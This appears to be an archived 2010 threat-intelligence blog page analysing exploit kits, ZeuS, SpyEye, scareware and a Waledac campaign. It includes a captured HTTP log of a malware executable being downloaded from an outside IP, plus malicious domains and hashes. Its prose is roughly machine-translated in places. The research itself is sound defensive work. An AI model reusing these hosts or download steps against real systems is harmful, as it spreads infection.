MalwareIntelligence is a site dedicated to research on all matters relating to anti-malware security, criminology computing and information security in general, always from a perspective closely related to the field of intelligence.

28.1.10

Automation in creating exploits II

The exploitation of vulnerability now represents one of the highest infection strategies used in the stage of crimeware and exploits while allowing exploit weaknesses aren't a new concept, the fact is that more and more notorious actions.

In fact now continue to be exploited, especially through exploits pack, a large number of vulnerabilities that many have been settled more than two years ago.

However, when these vulnerabilities are of type 0-Day, the problem is power. Cases such as "Operation Aurora" which has recently been bandied about by exploiting a vulnerability in the type 0-Day Internet Explorer 6. Yes, you read that right ... Internet Explorer 6 and currently is being used to spread malware mass but only through version 6, but also on the 7 and 8.

The vulnerability is identified as CVE-2010-0249, and as was the case with the vulnerability exploited by the worm conficker (MS08-067) where automated creation, has recently met a builder that automates the creation of the exploit for Internet Explorer in an extremely simple question that is common in such applications.

This application is Chinese and only lets you configure the web address from where you try to exploit the weakness in the browser. Then generates a file called IE.html containing the exploit code and the url used for the attack, which is obfuscated.

As condiments relevant subject, the exploit generated (embedded in the html) is detected by less than 40% of companies reporting according to antivirus virutotal. While the builder is detected, by far, at least 25%.

On the other hand, exploits automation generates a gap, revealing that many operations "disguised" as part of campaign of distraction after simple attacks, are closely related to intelligence affairs.

Related Information
Automatización en la creación de exploits
Process Automation anti-analysis II
Automating processes anti-analysis through of crimeware

Jorge Mieres

Ver más

Zeus and the theft of sensitive information

In light of all the recent financal trojans here are two examples of what ZeuS-bots have modules for. These modules are recording form info and keystrokes from user' logging into Bank of America and Paypal. Both of these screenshots are examples of the capabilities of the newer ZeuS-bots out there.

This and keylogging opens the bank vault for these organized groups operating around the world. Here is the gateway that enables them to wire-transfere your money to money-mule networks and back to them.



The features shown here along with keylogging that is transmitted back to the C&C's opens many doors for espionage. These trojans open the floodgates.

To see examples of what they and others have done see Brian Krebs blog which covers among other things Remote Access Trojans (RAT) and online bank theft.

Related Information
Leveraging ZeuS to send spam through social networks
ZeuS Botnet y su poder de reclutamiento zombi
ZeuS, spam y certificados SSL
Eficacia de los antivirus frente a ZeuS
Special!!! ZeuS Botnet for Dummies
Botnet. Securización en la nueva versión de ZeuS
Fusión. Un concepto adoptado por el crimeware actual
ZeuS Carding World Template. (...) la cara de la botnet
Financial institutions targeted by the botnet Zeus. Part two
Financial institutions targeted by the botnet Zeus. Part one
LuckySploit, the right hand of ZeuS
Botnet Zeus. Mass propagation of his Trojan. Part two
Botnet Zeus. Mass propagation of his Trojan. Part one

Ben Koehl
Crimeware Researcher in Malware Intelligence

Ver más

27.1.10

SpyEye. New bot on the market

SpyEye, a bot which first’s release was on January’s 2 of this year, is a "fresh" malware of interesting features, which has a considerable fast development, being on its 1.0.65 version at the moment.

It was written almost in its entirety on C++, and the binary file has a size of 60kb approximately.
It works from Windows 2000 to Windows 7, and it runs on ring3 (something that possibly makes it detectable for tools like GMER).

Something really interesting here, is that, at the date of first release, the detection rate was basically zero. The price of this bot (base bundle) is USD 500, and some of the features that this bot has at the moment are:
  • Formgrabbing (an advanced keylogging method of capturing web form data) supporting Firefox, IE, Maxthon and Netscape.
  • CC Autofill (A module that, basically, automates the process of credit card frauds, and gives money to the owner)
  • PHP-MYSQL Administration Panel
  • Daily backup of the database via e-mail
  • Exe String-Sources encryption
  • FTP Grabbing (Total Commander, Notepad++, FileZilla, and others)
  • POP3 Grabbing
  • Invisible in processes list, hidden file, invisible in autorun (registry)
As the author says, the mentioned product is very stable, and has a permanence rate of 30%.
As we can see, this industry is in a constant growing-and-sophistication process, something that after all, is very alarming.

Related Information
State of the art in Eleonore Exploit Pack
Siberia Exploit Pack. Another package of explois In-the-Wild
RussKill. Application to perform denial of service attacks
DDoS Botnet. New crimeware particular purpose
JustExploit. New Exploit kit that uses vulnerabili...
Fragus. New botnet framework In-the-Wild
ZeuS Botnet y su poder de reclutamiento zombi
Liberty Exploit System. Alternatively crimeware to...

Mariano Miguel
Malware Researcher in Malware Intelligence

Ver más

25.1.10

Leveraging ZeuS to send spam through social networks

We were able to analyze a pack to make zombies of ZeuS at spammers through social networks. Specifically, the module is analyzed developed for use in Vkontakte.ru, the Russian clone of Facebook.

This crimeware has been created by someone calling himself Deex of Freedomscripts Team and sold for the modest price of USD 100 (via WebMoney).

The pack includes several configuration files, which make it:

  • config.ini: has defined the target (friends or online, although so far only seems to work the first option) and password of the administrator control panel. When selecting friends, messages are sent to all our contacts, but are not online at that time.
  • message.txt: contains the text of the message to send.
  • title.txt: contains the title of the message to send.
  • results.txt: here were keeping the infected user statistics (vkontakte identifier, IP and number of messages sent).
  • webinjects.txt: HTML code injected in the sitting of infected PCs sending spam trigger.
The contents of that file should be added (or completely replace) the file of the same name necessary to build binaries of ZeuS, and then reconstruct the configuration file and the executable of ZeuS.

Once the victim's PC is infected with this executable as well as sending a typical ZeuS reports, will check the page you visited and if the addition of Vkontakte.ru and be in English (does not work in other languages) , activate the injection of code in the page, which always maintains the appearance of authenticity.

From that moment, all requests are processed by the HTML page that handles getconfig.php later call to the real page to avoid suspicion, showing the user the actual content as you surf vkontakte.ru its pages; while below, sends a message every time you click a link from the page js.php, as seen in the following snippet from log:

The result can be seen in the sent items, where all messages that have been sending our contacts:

All this is managed from a panel of independent control of ZeuS, which requires no database to run, since configuration and reporting are in separate text files.

The control panel is simple enough. It has a blank login page with a box to put the password that gives access to the panel itself, with a menu of 5 options:

  • Reports: shows the result of sending spam. In our example, the ID has sent 20 messages from the specified IP.

  • Inject: shows the code injection (webinjects.txt) and links to three pages responsible for performing tasks involving the shipment.

  • Settings: From here you can manage the configuration files to change the password and set the title and body of the message to send. This data is stored in the configuration files mentioned above.

  • Help: A brief page with some indication of what this pack and the two component parts: Inject and Admin.

  • Logout. To exit the control panel.

In short, this package demonstrates how easy it's to take advantage of belonging to a botnet zombies under the control of ZeuS for the sending of messages through social networks.

Although this case concerns only in the first instance, to Vkontakte.ru, adapt it to other social networks or use it for other attacks through web pages, such as making fraudulent clicks, it would be pretty easy.

Related Information

ZeuS Botnet y su poder de reclutamiento zombi
ZeuS, spam y certificados SSL
Eficacia de los antivirus frente a ZeuS
Especial!! ZeuS Botnet for Dummies
Botnet. Securización en la nueva versión de ZeuS
Fusión. Un concepto adoptado por el crimeware actual
ZeuS Carding World Template. (...) la cara de la botnet
Entidades financieras en la mira de la botnet Zeus II
Entidades financieras en la mira de la botnet Zeus I
LuckySploit, la mano derecha de Zeus
ZeuS Botnet. Masiva propagación de su troyano II
ZeuS Botnet. Masiva propagación de su troyano I

Ernesto Martin

Crimeware Researcher in Malware Intelligence

Ver más

18.1.10

Justifying the unjustifiable in a world criminal

As many readers know, since we have been researching Malware Intelligence direct implications of all this new generation of malicious code and criminal activity that daily feed back the business of crimeware.

Under this premise, the researchers focused their efforts on trying to reveal the different branches that are entangled with each other in a tangle of illegal actions aimed mainly to get money from users through unethical techniques. And according to this ... there are still doubts that we are facing a big business that profit through illegal activities that rub? (obviously, always according to the laws of each country). I think the unanimous answer is NO.

Saved this assessment after exposing both content around the state of the art of crimeware, including relevant data yet unexposed to not hamper the continuity of investigations, and has become a common aspect receive messages and comments, most aggressive, those responsible for the development or commercialization of certain applications crimeware.

Under this scenario, and although I'm not giving explanations on the research we perform, this time an exception will expose two of the last comments we have received from those who are part of the business of crimeware.

Especially because in some way reflect the philosophy (of life and mental) who operate from the underground, but lately things are changing.

The first case is an anonymous, non-aggressive that I personally must confess that ... very nice:) left by one of the Partners, which markets the crimeware YES Exploit System. The comment was made in the article that talks about this exploit pack, and which also find my answer. The comment is as follows:

YES, We are the blackhats :)
Thanks for small review, but why do ppl think that blackhats are poor guyz?
It's just a business, no less, no more :) Do you wanna buy our excellent product? - there is discounts for you ;)


As they say my "friends" to them is "just a business, neither more nor less." However, let us agree that, besides not being a conventional business, represents a business model that directly and actively collaborates with criminal activities, which isn't so funny.

Now, YES Exploit System is a crimeware development that has much in your code and whose market value is USD 800. And the one thing is funny (as last sentence of the comet) is knowing that I will not get any discount on crimeware ;)

The second case I want to present is a bit more aggressive in terms of what was written in the report on the Russian service to test the detection of malware, it can read the comment and my response, which does not transcribe here because of its length. The message reads:

"In summary, further evidence that not only the exploitation of malware generates profits but also moves parallel money on services to
this industry. And in some cases like the present one, have to see if you can consider this service as a criminal act or not."

Wow and why would this service be criminal act?


It's clear to me that someone has a year work in a software like this scanner and he want to make money with it.
If you don't like it don't use it. Noone forces you to pay for it or submit files there but since I see you are a little wanker
blogger who does not respect others work I giving it to you straight.

You have no inside experience in the antivirus industry whatsoever otherwise you would know that VirusTotal distributes 200K files/day
to antivirus companies for FREE. AV companies are shit on online scanners, they wouldn't even contact you if you would ask them about file
distribution and they definately wouldn't support an online scanner so what else can these services do to remain online?

Before you criticizing others work put something down on the table little frustrated shit..."

Regardless of the aggressive connotation that presents this second point, it's interesting who comes. Someone who uses the word as a nickname "KLESK" and host of an "attempt by business" completely unlawful, in which page one of the first things we read is "Selling corporate data, trade secrets".

"We sell corporate data and trade secrets", continues the propaganda. Clarify further what type of information supposedly "steal" companies, and topped with something very interesting:

"Please losers/asszors stay away, all the data bids start on 5 figures" :: Without words… :)

In order, particularly the latter case represents a good opportunity to analyze the psychology of a prospectus to cyber-criminal whose attempt to "negotiate" not only leaves much to be desired but can not even be rated as a possibility to be considered as an object research.

Related Information
Russian service online to check the detection of malware
YES Exploit System. Otro crimeware made in Rusia

Jorge Mieres

Ver más

16.1.10

YES Exploit System. Official Business Partner’s

Undoubtedly, the business that is currently crimeware expands every day. Not only this aspect is reflected in the professionalization on the development and operation of various computer applications and technologies used to commit crimes and attacks via web, but also on sales strategies that are used to channel the attention of a greater volume of restless minds, who collect stealing money from others on a foundation of business, a botnet.

While even 90% of the sale of crimeware takes place in an environment where supply is underground proposal directly by the creator of crimeware, cyber-criminals are taking their business to a level underground "clearer" and "more high", publicizing their developments through websites designed exclusively to offer their "services" but through" business partners" to ensure the logistics of the case.

In early 2009 we mentioned the case of the sale via the web, Unique Sploit Pack, one of the general purpose exploit pack currently most in demand, whose commerce website was online a while until I was discharged just because it's a crimeware.

However, this strategy in marketing, sales increased again to the plane of the hand of YES Exploit Pack, one of the most active crimeware today.

Under the slogan "Improve your business with YES Exploit System. Exploit Pack from Russia" proposed sale of version 2 of this exploit pack through a website registered in Russia.

The propaganda campaign (marketing strategy) from the website is to explain briefly what are the salient features of crimeware, by way of justifying why it's better than other packages on your style (the competition). It costs USD 800 and the transaction is done, as is typically done via WebMoney.

The crimeware business expands its logistical and this obviously is a true test that shows the evolution of a black market, or not so secret, not only whose challenges lie in seeking technical alternatives that can evade the mechanisms of analysis.

Related information
YES Exploit System. Otro crimeware made in Rusia
YES Exploit System. Manipulando la seguridad del atacante
Crimeware in 2009
Prices of Russian crimeware. Part 2
Comercio Ruso de versiones privadas de crimeware...
Panorama actual del negocio originado por crimeware

Jorge Mieres

Ver más

9.1.10

Napoleon Sploit. Frameware Exploit Pack

This is the first release of an exploit pack to monitor a particular purpose botnets alled Napoleon Sploit, which launched the underground market crimeware in August 2009.

Due to his premature and low status of "complex Exploit Pack" when compared with others of its style, is low cost and in fact had no impact on the underground circuit sales, although it's still for sale at a cost USD 299 can obtain important updates for USD 35 plus.

As we see in the image, its interface is very simple and minimalist. Only has two modules (statistical and configuration) plus panel authentication (login via web), and according to its author, the style of light colors crimeware is designed to not cause fatigue in the light of cybercriminals, "future clients".

(No words, but I expect opinions on this). The following image belongs to the control panel.

The Exploit pack is designed to exploit specific vulnerabilities according to the following exploits:
  • MDAC - IE5, IE6
  • Opera Telnet - Opera 9.00 - 9.27
  • PDF Util.Printf - PDF Adobe Reader 8.1.2
  • PDF Collab.Geticon PDF Util.Printf - Adobe Reader & Acrobat > 8.1.2
One detail that I can not pass is that crimeware is the ancestor of Siberia Exploit Pack, other particular purpose web application developed by the same author Napoleon Sploit, who is In-The-Wild.

Related information
State of the art in Eleonore Exploit Pack
Siberia Exploit Pack. Another package of explois I...
RussKill. Application to perform denial of service...
JustExploit. New Exploit kit that uses vulnerabili...
DDoS Botnet. New crimeware particular purpose
ZeuS Botnet y su poder de reclutamiento zombi
Phoenix Exploit’s Kit. Otra alternativa para el control de botnets
iNF`[LOADER]. Control de botnets, marihuana y propagación de malware
Fragus. New botnet framework In-the-Wild
Liberty Exploit System. Alternatively crimeware to...

Jorge Mieres

Ver más

A recent tour of scareware XX

Anti-Virus Live 2010 = Anti-Virus Elite 2010, ErrorClean y NoAdware
MD5: c50dc619e13345dec2444b0de371dfd4
IP: 204.232.131.12
204.232.131.14
United States United States Hoboken Noadware.net
Domains associated
antivirus-live.com
Result: 9/41 (21.95%)

NoMalware
IP: 88.214.204.221 - 72.9.100.114
United Kingdom United Kingdom Hosting Solutions Ltd
United States United States New York Access Integrated Technologies Inc
Domains associated
ontogen.com
nomalwares.org
nomalwarelab.com


Malware Mechanic

MD5: ce48aeb8e8b007b601a7f584d1b7901c
IP: 72.9.100.115
United States United States New York Access Integrated Technologies Inc
Domains associated
malwaremechanic.com



newsneg.ru, back-shure.ru, year-sneg.ru, yearsneg.ru, night-up.ru, nightup.ru, snegyear.ru, sneg-new.ru, up-day.ru, (91.213.29.15) - Russian Federation Russian Federation Info-media Ltd
world-info2.com (193.104.22.202) - Malta Malta Kratosweb-net
anyboom.biz (88.214.204.236) - United Kingdom United Kingdom Hosting Solutions Ltd
sekuritylistsite.com (94.102.63.245) - Netherlands Netherlands Amsterdam The King Host
online-antispym2.com (68.168.212.142) - United States United States Secaucus Honelive
bestsekuritylist.com (193.169.234.3) - Jamaica Jamaica Titan-net Ltd
coolsecuritylist.com (212.150.107.40) - Israel Israel Tel Aviv Loads

Related information
A recent tour of scareware XIX
A recent tour of scareware XVIII
Una recorrida por los últimos scareware XVII
Una recorrida por los últimos scareware XVI
Una recorrida por los últimos scareware XV
Una recorrida por los últimos scareware XIV
A recent tour of scareware XIII
A recent tour of scareware XII
A recent tour of scareware X
Una recorrida por los últimos scareware X
Una recorrida por los últimos scareware IX
Una recorrida por los últimos scareware VIII
Una recorrida por los últimos scareware VII
Una recorrida por los últimos scareware VI
A recent tour of scareware V
A recent tour of scareware IV
A recent tour of scareware III
A recent tour of scareware II
A recent tour of scareware

Jorge Mieres

Ver más

5.1.10

Crimeware in 2009

"Crimeware in 2009" presented in one document all that was channeled through this blog during the year in question on crimeware and associated hazards.

There are a total of 262 pages and is divided by the most relevant topics that describe the criminal activities that were a source of news on this blog. Has two indices for getting the news in a simple (content) and another on the images (image index).

Then let some of the themes they found in the document in question:
  • Current business outlook caused by crimeware
  • Framework Exploit Pack for botnets general purpose
  • Framework Exploit Pack for botnets particular purpose
  • Services associated with crimeware
  • Intelligence in the fight against crimeware
  • Campaigns of spread and infection
  • Other Exploits packs that were investigated
Short information
Malware Intelligence
Annual compendium of information. Crimeware in 2009
262 pages
Spanish language

Download


Jorge Mieres

Ver más

4.1.10

State of the art in Eleonore Exploit Pack

Since launching the first version in June 2009, Eleonore Exploit Pack has a major impact in the criminal field, both from the demand to get the Exploit Pack because of its cost competitive compared to similar web applications, as its high rate of activity.

It currently has a repertoire of 6 (six) versions, the last being 1.3.2, recently appeared on the scene underground at a cost of USD 1000.

This means that its author, ExManoize, the package was updated approximately every month, giving a concrete idea of the effort placed in its development, and that obviously isn't by vocation but responds, part of the fraudulent business, collaborating with the creation and maintaining one of the "tools" used in the criminal field.

The structure of this crimeware is quite complex and has a repertoire of 13 (thirteen) exploits by default included in the package and include:
  • MDAC for MSIE
  • MS009-02 for MSIE
  • ActiveX pack. Funciona en MSIE
  • compareTo for Firefox
  • JNO (JS navigator Object Code) for Firefox
  • MS06-006 for Firefox
  • Font tags for Firefox
  • Telnet for Opera
  • PDF collab.getIcon for all browser
  • PDF Util.Printf for all browser
  • PDF collab.collectEmailInfo for all browser
  • PDF Doc.media.newPlayer for all browser
  • Java calendar for all browser
Obviously, like any service that is offered in a market model, and it's crimeware including this, the "provider" secure the support, updates and cleanup of the package if necessary. All business!

From a historical standpoint, Eleonore Exploit Pack updatesare:
  • In June 2009 is available to the public the sale of Eleonore Exploit Pack v1.0 containing MDAC exploits, MS009-02, Snapshot, Telnet (for opera), PDF collab.getIcon, Util.Printf PDF, PDF collab.collectEmailInfo. Its value was in principle not of USD 599.
  • In July 2009 is updated to version 1.1 and adds two more exploits: Font tags that explodes in Firefox 3.5 and DirectX DirectShow that explodes in IE 6 and 7. Furthermore, there are improvements in encryption scripts. Its value was USD 500, and the previous version under the price to USD 300.
  • During the month of July, add the exploit Spreadsheet, PDF files are changed, eliminating the capture of images and adds the ability to upload a file through the admin panel itself. The version is called 1.2 and its cost is set at USD 700.
  • After a period of three months without updates in October is version 1.3, incorporating more features in the package fraudulent. Among them, some "improvements" exploits for Internet Explorer and adds Java D&E. The cost of this version was USD 1000.
  • In November began the marketing of version 1.3.1, which exploits continue to refine and, inter alia, add a Robots.txt file to improve the indexing and prevent certain folders are displayed. The price remained at USD 1000.
  • During this time period, could be found In-the-Wild a private beta (1.3B).
  • On December 16, is the latest version, 1.3.2 that adds Java calendar and a recent vulnerability Exploit for PDF Doc.media.newPlayer, which until then was a 0-Day. Its value was unchanged.
From the standpoint of the employer, the infrastructure to handle the business of botnets is to assemble and put into operation through a dedicated server can also be hired. However, to obtain the economic benefit of the zombies is needed because without them there could be fraudulent better job for schools are designed. In fact, the package is updated fairly regularly, demonstrates that the benefits obtained through these activities are important.

Moreover, regardless of the cost has crimeware, there are "extra services" offered by the developer, which are not included in the original package, for example, cleaning of the botnet at a cost USD 50, as the malicious domain change for the same value, USD 50.

Alternatively, botmaster (not necessarily the web application developers) often rent their botnet partially, and in the case of Eleonore Exploit Pack v1.3.2, your rent is USD 40 per day.

Related information
Siberia Exploit Pack. Another package of explois I...
RussKill. Application to perform denial of service...
JustExploit. New Exploit kit that uses vulnerabili...
DDoS Botnet. New crimeware particular purpose
T-IFRAMER. Kit for the injection of malware In-the...
Fragus. New botnet framework In-the-Wild
Liberty Exploit System. Alternatively crimeware to...
TRiAD Botnet III. Remote administration of multi-p...
Eleonore Exploits Pack. New Crimeware In-the-Wild

Jorge Mieres

Ver más

3.1.10

Crimeware-as-a-Service and antivirus evasion schemes

The business models offered by cloud computing are not new. Even many services currently offered under this banner have a model already established long ago in the market.

However, the Cloud Computing concept in itself that we know today responds to a sharply inclined orientation to generate business leveraging the Internet as infrastructure, which in a highly competitive market enjoys certain advantages over conventional business.

Under this scenario, the fact is that this way of creating business was also accepted and implemented by those who profit daily through a battery of programs designed for fraudulent purposes that when used over the Internet, receive the word of Crimeware-as-a-Service, or also by its acronym CaaS.

They begin to take shape fraudulent services that seek to automate the handling of malware in the process created solely to evade detection. An example of this is the service (which no longer exists), called PoisonIvy Polymorphic Online Builder, designed to encrypt malware and we talk at the time. In this case, when handling malicious code only, this service will be crowded under the term Malware-as-a-Service (MaaS).

Similarly, there are currently developed services for profit and intended to feed the crimeware business through mechanisms to verify the degree of effectiveness against malware antivirus scan engines.

These services are the antonym of other highly used by security professionals such as VirusTotal Hispasec Spanish company. On one of them also have spoken, called VirTest.

However, there are some other as Private antivirus service (established in 2008), which like VirTest is of Russian origin, and seek financial gain through a paid service, but also collaborate with the environment of cyber-crime by offering the possibility to check the malware created to meet their detection rate at a given moment, ensuring also that the binary will not be shared with antivirus companies. Thus, anonymity is assured and a longer life cycle for the threat.

The fraudulent service verifies the effectiveness of malware against 17 antivirus engines known anti-malware market, and as displayed in the first catch, there are three costs depending on the characteristic of the "hired":
  • USD 0.2 by check
  • USD 15 by 10 Chequeos limited daily
  • USD 20 for checks unlimited
Once inside the system, since the flap AV check, the binaries are uploaded to be submitted to the antivirus scan, then the report and providing a history of uploads. These options are found in the lower left corner.

An interesting aspect that offers this service of crimeware, which is the ability to schedule tasks of verification, through the second tab called Scheduler.

This option allows, first, upload a malicious file from the hard drive of the creator of malware, and on the other, select a malware that is already present in the circuit of propagation through the URL, ie that the cyber -crooks can verify and monitor and detect malicious code that already this spreading.

In this way and through the "programmer", is scheduled checkup frequency uploaded malicious code based on a set of parameters that are chosen according to a set time ranging in the range of 3, 6, 12 hours, or 1 and 3 days.

These parameters are configurable and once established can be viewed in a table shown in the same window. The third column corresponds to the time range. It also configures how display a warning to the report, which may be through email or through ICQ.

Clearly, these options are designed considering criminal maneuvering speed of propagation of malware checking, in the shortest of times, every 3 hours to check if the threat is detected by antivirus companies. This allows the malware to change whenever necessary, and to combine the service with others such as the "service" referred to above for encrypting the files.

Obviously those who are part of the criminal chain of crimeware business, working together through different alternatives, forming also a business side that also feeds on the criminal activities.

Related information
Russian service online to check the detection of malware
Software as a Service on the malware industry
Creating Online PoisonIvy based polymorphic malware

Jorge Mieres

Ver más

2.1.10

Waledac. Timeline '07-'09

The trojan waledac in charge of recruiting zombies for a botnet dedicated to feed spam, recently returned to give notice as an excuse to use the new year 2010.

However, their fraudulent activities dating from 2007 when he was known under the nomenclature of storm, and since then, this family of malware has taken advantage of social engineering as the main strategy of propagating different coverages.

This timeline extends from the first activities of social engineering to the last and most recently known relacionda at the beginning of 2010.

Related information
Waledac returns with another attack strategy
Waledac/Storm. Past and present a threat
Massive campaign to spread/infection Waledac launched by using as excuse the Independence Day of USA
Estrategia BlackHat SEO propuesta por Waledac
Waledac. Seguimiento detallado de una amenaza latente
More Waledac in action. Can you guess how much you master win?
Waledac more loving than ever
Social Engineering and Waledac Valentine

Jorge Mieres

Ver más

1.1.10

Waledac returns with another attack strategy

After a long period of inactivity, the botnet consisting waledac again deploy a strategy of infection using the pattern that characterizes it: Social Engineering, that this time advantage as cover the beginning of the new year.

Latest waledac campaigns dating from the middle of the year when propagation strategy used pretended to be a video on Independence Day in the U.S., hosted on YouTube. In fact, the most important activity this year came during the first quarter.

Here we see catches describe waledac timeline about their business during 2009.

However, those who are behind waledac never stopped and have recently used the domain registration date throughout the period of supposed inactivity.

Each page used for the propagation has a script obfuscated with instructions to be executed automatically on the victim machine. Thus, it exploits a weakness and automatically download and execute malware, turning your computer into a node of the botnet to continue with their activities. We then see a screenshot of the script.

Inside the script is the reference to the counter.php file hosting another script and from which it jumps to http://diokxbgrqkgg.com/ld/trest1/ and this http://diokxbgrqkgg.com/nte/trest1. py, where there is another malicious script.

GET /counter.php HTTP/1.1
Host: aju.nonprobs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://aju.nonprobs.com/2010.html


In this instance, download and run a file called "ny_foroplay.exe" (MD5: df2d6f835ad6e5276b1b1ffe73170070) from IP address 95.169.190.208 hosted in Russia.

It's worth noting that this malware has a very low rate of detection, being detected to date antivirus companies only 6 out of 40. Report VT.

GET /pr/pic/ny_foroplay.exe HTTP/1.0
Host: 95.169.190.208

HTTP/1.0 200 OK
Age: 1542
Date: Fri, 01 Jan 2010 19:22:58 GMT
Content-Length: 416256
Content-Type: application/octet-stream
Server: nginx/0.8.15
Last-Modified: Fri, 01 Jan 2010 19:22:58 GMT

MZ......................@...............................................!..L.!This program cannot be run in DOS mode.
$.........y.=u..=u..=u...u..u..

Waledac is back with a new excuse, but judging by the percentage of activity that owns the server where it's housed, it appears that he always remained dormant with very sporadic activities. Even taking into account the folder structure from which to download, seems to have a direct relationship with another threat that is Bredolab well known, and which apparently also associated with some scareware and ZeuS.

Related information
Waledac/Storm. Past and present a threat
Massive campaign to spread/infection Waledac launched by using as excuse the Independence Day of USA
Estrategia BlackHat SEO propuesta por Waledac
Waledac. Seguimiento detallado de una amenaza latente
More Waledac in action. Can you guess how much you master win?
Waledac more loving than ever
Social Engineering and Waledac Valentine

Jorge Mieres

Ver más